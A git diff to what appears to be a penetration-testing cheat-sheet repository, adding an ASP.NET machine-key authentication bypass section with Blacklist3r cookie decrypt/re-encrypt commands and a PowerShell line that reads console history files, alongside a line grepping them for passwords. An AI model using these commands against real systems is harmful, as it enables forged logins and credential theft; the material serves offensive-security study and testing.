diff --git a/API Key Leaks/README.md b/API Key Leaks/README.md index 20ee3239..a2693956 100644 --- a/API Key Leaks/README.md +++ b/API Key Leaks/README.md @@ -15,6 +15,8 @@ - [Twitter API Secret](#twitter-api-secret) - [Twitter Bearer Token](#twitter-bearer-token) - [Gitlab Personal Access Token](#gitlab-personal-access-token) + - [Auth Bypass using pre-published Machine Key](#auth-bypass-using-pre-published-machine-key) + ## Tools @@ -87,7 +89,31 @@ curl "https://gitlab.example.com/api/v4/projects?private_token= By default, ASP.NET creates a Forms Authentication Ticket with unique a username associated with it, Date and Time at which the ticket was issued and expires. So, all you need is just a unique username and a machine key to create a forms authentication token + +That machine key is used for encryption and decryption of forms authentication cookie data and view-state data, and for verification of out-of-process session state identification. + +Example of a machineKey from https://docs.microsoft.com/en-us/iis/troubleshoot/security-issues/troubleshooting-forms-authentication. + +```xml + +``` + +Exploit with [Blacklist3r](https://github.com/NotSoSecure/Blacklist3r) + +```powershell +# decrypt cookie +$ AspDotNetWrapper.exe --keypath C:\MachineKey.txt --cookie XXXXXXX_XXXXX-XXXXX --decrypt --purpose=owin.cookie --valalgo=hmacsha512 --decalgo=aes + +# encrypt cookie (edit Decrypted.txt) +$ AspDotNetWrapper.exe --decryptDataFilePath C:\DecryptedText.txt +``` + + ## References * [Finding Hidden API Keys & How to use them - Sumit Jain - August 24, 2019](https://medium.com/@sumitcfe/finding-hidden-api-keys-how-to-use-them-11b1e5d0f01d) * [Private API key leakage due to lack of access control - yox - August 8, 2018](https://hackerone.com/reports/376060) +* [Project Blacklist3r - November 23, 2018 - @notsosecure](https://www.notsosecure.com/project-blacklist3r/) \ No newline at end of file diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index b4ab8cda..676ea9d5 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -44,7 +44,7 @@ - [Drop the MIC](#drop-the-mic) - [Ghost Potato - CVE-2019-1384](#ghost-potato---cve-2019-1384) - [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage) - - [Abusing Active Directory ACLs/ACEs](#abusing-active-directory-acls-aces) + - [Abusing Active Directory ACLs/ACEs](#abusing-active-directory-aclsaces) - [Trust relationship between domains](#trust-relationship-between-domains) - [Child Domain to Forest Compromise - SID Hijacking](#child-domain-to-forest-compromise---sid-hijacking) - [Unconstrained delegation](#unconstrained-delegation) diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index 29cebb6d..339fd23b 100644 --- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md @@ -394,6 +394,7 @@ Invoke-SessionGopher -AllDomain -u domain.com\adm-arvanaghi -p s3cr3tP@ss ```powershell type C:\Users\swissky\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt +type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt cat (Get-PSReadlineOption).HistorySavePath cat (Get-PSReadlineOption).HistorySavePath | sls passw ```